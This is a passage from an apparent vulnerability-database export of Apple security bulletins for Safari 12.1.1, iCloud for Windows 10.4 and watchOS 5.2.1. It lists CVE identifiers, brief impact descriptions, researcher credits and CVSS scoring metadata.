Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Michael Ball of Gradescope by Turnitin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 13, 2019\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-13T00:00:00", "type": "apple", "title": "About the security content of Safari 12.1.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2019-05-13T00:00:00", "id": "APPLE:4818844A5404FC371177D5D6FC37AAF6", "href": "https://support.apple.com/kb/HT210123", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:44:08", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Safari 12.1.1\n\nReleased May 13, 2019\n\n**WebKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and included in macOS Mojave 10.14.5\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and included in macOS Mojave 10.14.5\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Michael Ball of Gradescope by Turnitin for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-13T05:28:02", "title": "About the security content of Safari 12.1.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2019-05-13T05:28:02", "id": "APPLE:HT210123", "href": "https://support.apple.com/kb/HT210123", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:44:29", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 10.4\n\nReleased June 11, 2019\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**WebKit**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-12T09:10:16", "title": "About the security content of iCloud for Windows 10.4 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8577", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2019-06-12T09:10:16", "id": "APPLE:HT210212", "href": "https://support.apple.com/kb/HT210212", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T04:14:04", "description": "# About the security content of watchOS 5.2.1\n\nThis document describes the security content of watchOS 5.2.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 5.2.1\n\nReleased May 13, 2019\n\n**AppleFileConduit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8593: Dany Lisiansky (@DanyL931)\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added August 1, 2019\n\n**Disk Images**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2019-8605: Ned Williamson working with Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Mail**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8626: natashenka of Google Project Zero\n\n**Mail Message Framework**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2019-8613: natashenka of Google Project Zero\n\n**Messages**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8664: natashenka of Google Project Zero\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause a system denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8573: natashenka of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8664: natashenka of Google Project Zero\n\nEntry added July 3, 2019\n\n**MobileInstallation**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**MobileLockdown**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8637: Dany Lisiansky (@DanyL931)\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**sysdiagnose**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated February 3, 2020\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 30, 2019\n\n**Wi-Fi**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A device may be passively tracked by its Wi-Fi MAC address\n\nDescription: A user privacy issue was addressed by removing the broadcast MAC address.\n\nCVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**Clang**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge Vozzie and Rami and m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero and an anonymous researcher for their assistance.\n\n**MediaLibrary**\n\nWe would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance.\n\n**MobileInstallation**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-13T00:00:00", "type": "apple", "title": "About the security content of watchOS 5.2.1", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8573", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8585", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8593", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8605", "CVE-2019-8607", "CVE-2019-8612", "CVE-2019-8613", "CVE-2019-8620", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8626", "CVE-2019-8637", "CVE-2019-8664"], "modified": "2019-05-13T00:00:00", "id": "APPLE:0B002AB816638E74B596AA40B55E1D50", "href": "https://support.apple.com/kb/HT210122", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:09", "description": "# About the security content of iCloud for Windows 10.4\n\nThis document describes the security content of iCloud for Windows 10.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 10.4\n\nReleased June 11, 2019\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**WebKit**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Windows 10 version 18362.145 or higher\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: June 12, 2019\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-11T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 10.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2019-06-11T00:00:00", "id": "APPLE:902B102D254893DE7086BCC292F98025", "href": "https://support.apple.com/kb/HT210212", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:43:40", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 